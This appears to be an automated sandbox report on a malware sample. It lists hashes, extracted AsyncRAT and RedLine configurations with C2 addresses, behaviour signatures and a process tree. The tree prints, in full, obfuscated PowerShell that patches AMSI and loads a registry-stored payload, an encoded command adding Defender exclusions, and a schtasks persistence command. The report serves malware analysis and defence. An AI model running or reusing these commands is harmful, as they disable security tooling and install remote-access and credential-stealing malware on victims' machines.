Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    05/08/2024, 15:52

General

  • Target

    59d3bc9ca446bf4fcce3a93cdbce134a.exe

  • Size

    322KB

  • MD5

    59d3bc9ca446bf4fcce3a93cdbce134a

  • SHA1

    37120e1b71956b5f3852605db0f33f4565a3952d

  • SHA256

    1a45c674c9c80cee378a210c83c2492baae976727c62bbaf262ee06e6b88c1db

  • SHA512

    d23ddc6d55d8bf237e68d946f1a330a14907ea2b891ccea0890f63ee0f47f746b6e1d9d2151da1744b36d14b06b428fe308ffd97ae44732f3491682610950b63

  • SSDEEP

    6144:3RptkRZIFoIkY/7J81GyQUMTa5+suXqWxHNDf1CPyysAosQSPJHdlLTpn:jHoIfjJ80Rl86xHTCPvsASQJHd

Malware Config

Extracted

Family

asyncrat

Version

0.5.8

C2

blue.o7lab.me:7777

server.underground-cheat.xyz:7777

Mutex

RPYntXGt1eJi

Attributes
  • delay

    3

  • install

    true

  • install_file

    WinUpdate.exe

  • install_folder

    %AppData%

aes.plain

Extracted

Family

redline

Botnet

server.underground-cheat.xyz

C2

server.underground-cheat.xyz:1337

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 2 IoCs
  • SectopRAT

    SectopRAT is a remote access trojan first seen in November 2019.

  • SectopRAT payload 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Async RAT payload 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Run Powershell and hide display window.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 7 IoCs
  • Indicator Removal: Clear Windows Event Logs 1 TTPs 2 IoCs

    Clear Windows Event Logs to hide the activity of an intrusion.

  • Drops file in System32 directory 13 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 16 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks SCSI registry key(s) 3 TTPs 18 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:600
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:1020
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{dfc308e9-aa8e-4d63-aa6a-c3668dfbf87e}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1048
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{2ad1b976-44ef-4644-8bca-0ee4f708a3cf}
          2⤵
            PID:4284
        • C:\Windows\system32\lsass.exe
          C:\Windows\system32\lsass.exe
          1⤵
            PID:676
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
            1⤵
              PID:956
            • C:\Windows\system32\svchost.exe
              C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
              1⤵
                PID:408
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                1⤵
                  PID:1036
                • C:\Windows\System32\svchost.exe
                  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                  1⤵
                    PID:1136
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                    1⤵
                      PID:1152
                    • C:\Windows\System32\svchost.exe
                      C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                      1⤵
                      • Indicator Removal: Clear Windows Event Logs
                      PID:1160
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                      1⤵
                      • Drops file in System32 directory
                      PID:1168
                      • C:\Windows\system32\taskhostw.exe
                        taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                        2⤵
                          PID:2796
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:XDnmLBexBtad{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$WQTicWdrecJDyK,[Parameter(Position=1)][Type]$kcOOgEUIPP)$whlKiWFmrFv=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+[Char](102)+''+'l'+''+[Char](101)+'c'+[Char](116)+'e'+[Char](100)+''+'D'+''+'e'+''+'l'+'e'+'g'+''+[Char](97)+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('In'+'M'+''+[Char](101)+''+[Char](109)+'o'+[Char](114)+'y'+[Char](77)+''+'o'+'d'+[Char](117)+''+'l'+''+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+''+'D'+''+'e'+''+[Char](108)+''+[Char](101)+''+'g'+''+[Char](97)+''+'t'+''+'e'+''+[Char](84)+''+[Char](121)+''+[Char](112)+'e','C'+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+','+[Char](80)+''+[Char](117)+'bl'+[Char](105)+''+'c'+''+','+'Se'+'a'+'le'+[Char](100)+''+','+''+'A'+''+[Char](110)+''+[Char](115)+''+[Char](105)+'C'+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+''+[Char](44)+'A'+[Char](117)+''+[Char](116)+'o'+[Char](67)+'l'+[Char](97)+'ss',[MulticastDelegate]);$whlKiWFmrFv.DefineConstructor(''+[Char](82)+'T'+[Char](83)+'pe'+[Char](99)+''+'i'+''+[Char](97)+''+'l'+''+[Char](78)+''+'a'+''+'m'+''+'e'+''+[Char](44)+''+[Char](72)+'id'+'e'+''+[Char](66)+''+'y'+''+[Char](83)+'ig'+[Char](44)+'P'+[Char](117)+''+[Char](98)+'l'+'i'+''+'c'+'',[Reflection.CallingConventions]::Standard,$WQTicWdrecJDyK).SetImplementationFlags(''+[Char](82)+''+'u'+''+'n'+'ti'+'m'+''+[Char](101)+''+[Char](44)+''+'M'+'a'+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+'d'+'');$whlKiWFmrFv.DefineMethod('Inv'+[Char](111)+''+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+'i'+''+[Char](99)+''+[Char](44)+'Hi'+[Char](100)+''+[Char](101)+'B'+[Char](121)+''+[Char](83)+''+[Char](105)+''+'g'+''+[Char](44)+'Ne'+[Char](119)+''+[Char](83)+''+'l'+''+'o'+''+[Char](116)+','+[Char](86)+'i'+[Char](114)+''+[Char](116)+''+'u'+''+[Char](97)+''+[Char](108)+'',$kcOOgEUIPP,$WQTicWdrecJDyK).SetImplementationFlags(''+[Char](82)+''+'u'+''+'n'+'ti'+[Char](109)+''+[Char](101)+','+'M'+''+'a'+'n'+[Char](97)+''+[Char](103)+'ed');Write-Output $whlKiWFmrFv.CreateType();}$aLJBwNvNCLAGu=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+'s'+'t'+[Char](101)+''+'m'+'.'+[Char](100)+''+'l'+'l')}).GetType(''+[Char](77)+''+'i'+''+[Char](99)+''+[Char](114)+''+'o'+''+[Char](115)+''+[Char](111)+''+'f'+''+'t'+''+'.'+''+[Char](87)+'i'+[Char](110)+'32'+[Char](46)+''+[Char](85)+'n'+[Char](115)+''+[Char](97)+'f'+'e'+''+[Char](78)+''+'a'+'t'+[Char](105)+''+[Char](118)+''+[Char](101)+''+[Char](77)+''+[Char](101)+''+[Char](116)+''+[Char](104)+''+[Char](111)+''+'d'+''+[Char](115)+'');$ZntrQcrqxrggMt=$aLJBwNvNCLAGu.GetMethod('G'+[Char](101)+'t'+[Char](80)+'r'+[Char](111)+''+[Char](99)+''+[Char](65)+''+[Char](100)+'d'+'r'+'e'+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags]('P'+'u'+''+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+'t'+[Char](97)+'ti'+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$IGaFROGjJiiIOWHkIiq=XDnmLBexBtad @([String])([IntPtr]);$KUPQNFNTnXzGxBdWKAqvxI=XDnmLBexBtad @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$oyfhBtVsCWA=$aLJBwNvNCLAGu.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+''+'M'+'o'+[Char](100)+''+'u'+''+[Char](108)+''+'e'+''+[Char](72)+''+'a'+''+[Char](110)+''+'d'+'l'+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+'e'+'r'+'n'+[Char](101)+''+'l'+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$VFEOBQDaIHkZdK=$ZntrQcrqxrggMt.Invoke($Null,@([Object]$oyfhBtVsCWA,[Object](''+'L'+'oadL'+[Char](105)+''+[Char](98)+'r'+[Char](97)+''+[Char](114)+''+[Char](121)+'A')));$vdOtrSchBOLueNIlM=$ZntrQcrqxrggMt.Invoke($Null,@([Object]$oyfhBtVsCWA,[Object]('V'+'i'+''+[Char](114)+''+'t'+''+[Char](117)+''+'a'+''+'l'+''+[Char](80)+'ro'+[Char](116)+'e'+[Char](99)+''+[Char](116)+'')));$ywRRDUS=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VFEOBQDaIHkZdK,$IGaFROGjJiiIOWHkIiq).Invoke(''+[Char](97)+''+[Char](109)+''+[Char](115)+'i'+[Char](46)+'d'+'l'+''+'l'+'');$EJuqAOXozmSAunlrO=$ZntrQcrqxrggMt.Invoke($Null,@([Object]$ywRRDUS,[Object]('A'+[Char](109)+''+'s'+''+'i'+''+'S'+'c'+[Char](97)+''+[Char](110)+''+[Char](66)+''+'u'+'f'+[Char](102)+''+'e'+''+[Char](114)+'')));$IVVFpWjQAQ=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($vdOtrSchBOLueNIlM,$KUPQNFNTnXzGxBdWKAqvxI).Invoke($EJuqAOXozmSAunlrO,[uint32]8,4,[ref]$IVVFpWjQAQ);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$EJuqAOXozmSAunlrO,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($vdOtrSchBOLueNIlM,$KUPQNFNTnXzGxBdWKAqvxI).Invoke($EJuqAOXozmSAunlrO,[uint32]8,0x20,[ref]$IVVFpWjQAQ);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+'OF'+[Char](84)+''+'W'+''+[Char](65)+''+[Char](82)+''+'E'+'').GetValue(''+'$'+''+'7'+''+[Char](55)+''+'s'+''+'t'+''+'a'+''+[Char](103)+''+'e'+'r')).EntryPoint.Invoke($Null,$Null)"
                          2⤵
                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                          • Command and Scripting Interpreter: PowerShell
                          • Drops file in System32 directory
                          • Suspicious use of SetThreadContext
                          • Modifies data under HKEY_USERS
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:3668
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAVwBhAGkAdABIAGEAbgBkAGwAZQBcAFQAeQBwAGUASQBkAC4AZQB4AGUALABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACwAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAAgAC0ARgBvAHIAYwBlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAVwBhAGkAdABIAGEAbgBkAGwAZQBcAFQAeQBwAGUASQBkAC4AZQB4AGUA
                          2⤵
                          • Command and Scripting Interpreter: PowerShell
                          PID:2388
                          • C:\Windows\System32\Conhost.exe
                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            3⤵
                              PID:4400
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:XlmfBrNAMeix{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$SNjidkBtDfuTNc,[Parameter(Position=1)][Type]$yqDjAEzNpc)$XfDRZmPTcxA=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+'f'+'l'+''+[Char](101)+''+'c'+''+[Char](116)+''+[Char](101)+'d'+[Char](68)+'e'+[Char](108)+'e'+'g'+''+'a'+''+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+'n'+''+[Char](77)+''+[Char](101)+''+[Char](109)+'ory'+[Char](77)+''+[Char](111)+''+[Char](100)+''+'u'+''+[Char](108)+''+[Char](101)+'',$False).DefineType('M'+[Char](121)+'D'+[Char](101)+''+[Char](108)+'e'+[Char](103)+''+[Char](97)+''+[Char](116)+'e'+[Char](84)+''+[Char](121)+''+[Char](112)+''+'e'+'','C'+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+','+[Char](80)+''+'u'+''+'b'+'l'+'i'+''+'c'+''+[Char](44)+''+[Char](83)+''+[Char](101)+'al'+'e'+''+[Char](100)+''+[Char](44)+'A'+[Char](110)+''+'s'+''+[Char](105)+''+'C'+''+'l'+''+'a'+''+'s'+'s,A'+[Char](117)+''+'t'+''+'o'+''+'C'+''+[Char](108)+'ass',[MulticastDelegate]);$XfDRZmPTcxA.DefineConstructor(''+[Char](82)+'T'+'S'+''+[Char](112)+''+[Char](101)+'c'+[Char](105)+''+[Char](97)+'lN'+'a'+'m'+'e'+''+','+''+'H'+''+'i'+''+[Char](100)+'e'+'B'+''+[Char](121)+''+'S'+''+[Char](105)+''+[Char](103)+''+[Char](44)+'Pu'+'b'+''+[Char](108)+''+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$SNjidkBtDfuTNc).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+'i'+''+[Char](109)+'e'+','+''+[Char](77)+''+'a'+''+[Char](110)+''+[Char](97)+''+'g'+''+'e'+''+'d'+'');$XfDRZmPTcxA.DefineMethod(''+[Char](73)+'nv'+'o'+''+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+'u'+''+[Char](98)+'l'+[Char](105)+''+'c'+''+[Char](44)+''+[Char](72)+'ide'+[Char](66)+''+[Char](121)+''+[Char](83)+''+'i'+''+[Char](103)+''+[Char](44)+''+'N'+''+'e'+''+[Char](119)+''+'S'+''+[Char](108)+'ot'+','+''+[Char](86)+''+[Char](105)+''+[Char](114)+'t'+[Char](117)+'a'+'l'+'',$yqDjAEzNpc,$SNjidkBtDfuTNc).SetImplementationFlags(''+'R'+''+'u'+''+[Char](110)+''+'t'+''+[Char](105)+''+'m'+''+[Char](101)+',M'+[Char](97)+''+[Char](110)+'a'+'g'+''+[Char](101)+'d');Write-Output $XfDRZmPTcxA.CreateType();}$XkjyhlnmvZcto=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+'y'+''+[Char](115)+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+[Char](46)+'dl'+[Char](108)+'')}).GetType(''+'M'+''+'i'+''+'c'+''+[Char](114)+''+'o'+''+[Char](115)+'o'+[Char](102)+''+'t'+''+[Char](46)+''+[Char](87)+''+[Char](105)+''+'n'+''+[Char](51)+''+'2'+''+[Char](46)+''+[Char](85)+''+'n'+''+[Char](115)+'a'+[Char](102)+'e'+[Char](78)+''+[Char](97)+''+[Char](116)+'i'+[Char](118)+''+'e'+'M'+[Char](101)+''+'t'+''+'h'+''+[Char](111)+''+'d'+''+'s'+'');$EpzDXRqCELhXrA=$XkjyhlnmvZcto.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+'P'+[Char](114)+''+[Char](111)+''+[Char](99)+''+'A'+''+[Char](100)+'d'+[Char](114)+''+'e'+''+[Char](115)+''+'s'+'',[Reflection.BindingFlags]('P'+[Char](117)+''+'b'+''+[Char](108)+'i'+[Char](99)+''+','+''+[Char](83)+''+[Char](116)+'a'+[Char](116)+''+[Char](105)+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$ZeogvFGyrXABwVDLnRK=XlmfBrNAMeix @([String])([IntPtr]);$sbexbtkLDKbngDGlOTUuTo=XlmfBrNAMeix @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$OgTXKVptbqk=$XkjyhlnmvZcto.GetMethod(''+'G'+''+[Char](101)+'t'+[Char](77)+'o'+'d'+''+'u'+''+'l'+'eH'+[Char](97)+''+[Char](110)+''+[Char](100)+''+[Char](108)+'e').Invoke($Null,@([Object](''+[Char](107)+'e'+[Char](114)+'n'+[Char](101)+''+[Char](108)+''+[Char](51)+'2.dl'+'l'+'')));$GdiLaxwnsTbmbP=$EpzDXRqCELhXrA.Invoke($Null,@([Object]$OgTXKVptbqk,[Object](''+[Char](76)+''+[Char](111)+'a'+'d'+''+'L'+''+'i'+'b'+'r'+''+'a'+''+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$hovSaUtFcjgwgQmKt=$EpzDXRqCELhXrA.Invoke($Null,@([Object]$OgTXKVptbqk,[Object](''+'V'+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+'u'+''+[Char](97)+''+[Char](108)+''+[Char](80)+''+[Char](114)+''+'o'+''+[Char](116)+''+[Char](101)+''+'c'+'t')));$YmZHJlz=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GdiLaxwnsTbmbP,$ZeogvFGyrXABwVDLnRK).Invoke(''+'a'+''+[Char](109)+''+'s'+''+[Char](105)+''+[Char](46)+''+'d'+''+[Char](108)+''+[Char](108)+'');$cJyGVpdaKYsxWDnty=$EpzDXRqCELhXrA.Invoke($Null,@([Object]$YmZHJlz,[Object](''+'A'+''+[Char](109)+''+[Char](115)+'iS'+[Char](99)+''+[Char](97)+''+[Char](110)+''+[Char](66)+'uf'+'f'+'er')));$bPQcDRLoPP=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($hovSaUtFcjgwgQmKt,$sbexbtkLDKbngDGlOTUuTo).Invoke($cJyGVpdaKYsxWDnty,[uint32]8,4,[ref]$bPQcDRLoPP);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$cJyGVpdaKYsxWDnty,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($hovSaUtFcjgwgQmKt,$sbexbtkLDKbngDGlOTUuTo).Invoke($cJyGVpdaKYsxWDnty,[uint32]8,0x20,[ref]$bPQcDRLoPP);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+''+[Char](70)+'T'+[Char](87)+''+[Char](65)+'RE').GetValue('$7'+'7'+''+[Char](115)+''+[Char](116)+'ag'+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)"
                            2⤵
                            • Suspicious use of NtCreateUserProcessOtherParentProcess
                            • Command and Scripting Interpreter: PowerShell
                            • Drops file in System32 directory
                            • Suspicious use of SetThreadContext
                            • Modifies data under HKEY_USERS
                            PID:3532
                            • C:\Windows\System32\Conhost.exe
                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              3⤵
                                PID:4724
                            • C:\Users\Admin\AppData\Roaming\WaitHandle\TypeId.exe
                              C:\Users\Admin\AppData\Roaming\WaitHandle\TypeId.exe
                              2⤵
                              • Executes dropped EXE
                              • Suspicious use of SetThreadContext
                              PID:1820
                              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
                                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
                                3⤵
                                  PID:220
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                              1⤵
                                PID:1244
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                                1⤵
                                  PID:1252
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                                  1⤵
                                    PID:1340
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                    1⤵
                                      PID:1416
                                      • C:\Windows\system32\sihost.exe
                                        sihost.exe
                                        2⤵
                                          PID:2636
                                      • C:\Windows\system32\svchost.exe
                                        C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                        1⤵
                                          PID:1456
                                        • C:\Windows\System32\svchost.exe
                                          C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                          1⤵
                                            PID:1616
                                          • C:\Windows\system32\svchost.exe
                                            C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                            1⤵
                                              PID:1624
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                              1⤵
                                                PID:1640
                                              • C:\Windows\system32\svchost.exe
                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                                1⤵
                                                  PID:1732
                                                • C:\Windows\System32\svchost.exe
                                                  C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                                  1⤵
                                                    PID:1752
                                                  • C:\Windows\System32\svchost.exe
                                                    C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                                    1⤵
                                                      PID:1824
                                                    • C:\Windows\System32\svchost.exe
                                                      C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                      1⤵
                                                        PID:1940
                                                      • C:\Windows\System32\svchost.exe
                                                        C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                        1⤵
                                                          PID:1992
                                                        • C:\Windows\system32\svchost.exe
                                                          C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                          1⤵
                                                            PID:2004
                                                          • C:\Windows\system32\svchost.exe
                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                            1⤵
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:2016
                                                          • C:\Windows\System32\svchost.exe
                                                            C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                            1⤵
                                                              PID:1568
                                                            • C:\Windows\system32\svchost.exe
                                                              C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                              1⤵
                                                                PID:1872
                                                              • C:\Windows\System32\spoolsv.exe
                                                                C:\Windows\System32\spoolsv.exe
                                                                1⤵
                                                                  PID:2096
                                                                • C:\Windows\System32\svchost.exe
                                                                  C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                                  1⤵
                                                                    PID:2212
                                                                  • C:\Windows\System32\svchost.exe
                                                                    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                                    1⤵
                                                                      PID:2380
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                      1⤵
                                                                        PID:2492
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                        1⤵
                                                                          PID:2500
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                          1⤵
                                                                            PID:2648
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                            1⤵
                                                                            • Drops file in System32 directory
                                                                            PID:2712
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                            1⤵
                                                                              PID:2772
                                                                            • C:\Windows\sysmon.exe
                                                                              C:\Windows\sysmon.exe
                                                                              1⤵
                                                                                PID:2804
                                                                              • C:\Windows\System32\svchost.exe
                                                                                C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                                1⤵
                                                                                  PID:2832
                                                                                • C:\Windows\system32\svchost.exe
                                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                                  1⤵
                                                                                    PID:2840
                                                                                  • C:\Windows\system32\svchost.exe
                                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                                    1⤵
                                                                                      PID:2932
                                                                                    • C:\Windows\system32\wbem\unsecapp.exe
                                                                                      C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                                      1⤵
                                                                                        PID:3076
                                                                                      • C:\Windows\system32\svchost.exe
                                                                                        C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                        1⤵
                                                                                          PID:3448
                                                                                        • C:\Windows\Explorer.EXE
                                                                                          C:\Windows\Explorer.EXE
                                                                                          1⤵
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          • Suspicious use of UnmapMainImage
                                                                                          PID:3524
                                                                                          • C:\Users\Admin\AppData\Local\Temp\59d3bc9ca446bf4fcce3a93cdbce134a.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\59d3bc9ca446bf4fcce3a93cdbce134a.exe"
                                                                                            2⤵
                                                                                            • Checks computer location settings
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            • Modifies registry class
                                                                                            • Suspicious use of WriteProcessMemory
                                                                                            PID:2468
                                                                                            • C:\Users\Admin\AppData\Local\Temp\Install.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\Install.exe"
                                                                                              3⤵
                                                                                              • Executes dropped EXE
                                                                                              • System Location Discovery: System Language Discovery
                                                                                              PID:1404
                                                                                            • C:\Users\Admin\AppData\Local\Temp\$77svchost.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\$77svchost.exe"
                                                                                              3⤵
                                                                                              • Checks computer location settings
                                                                                              • Executes dropped EXE
                                                                                              • System Location Discovery: System Language Discovery
                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              PID:5032
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "WinUpdate" /tr '"C:\Users\Admin\AppData\Roaming\WinUpdate.exe"' & exit
                                                                                                4⤵
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                PID:1280
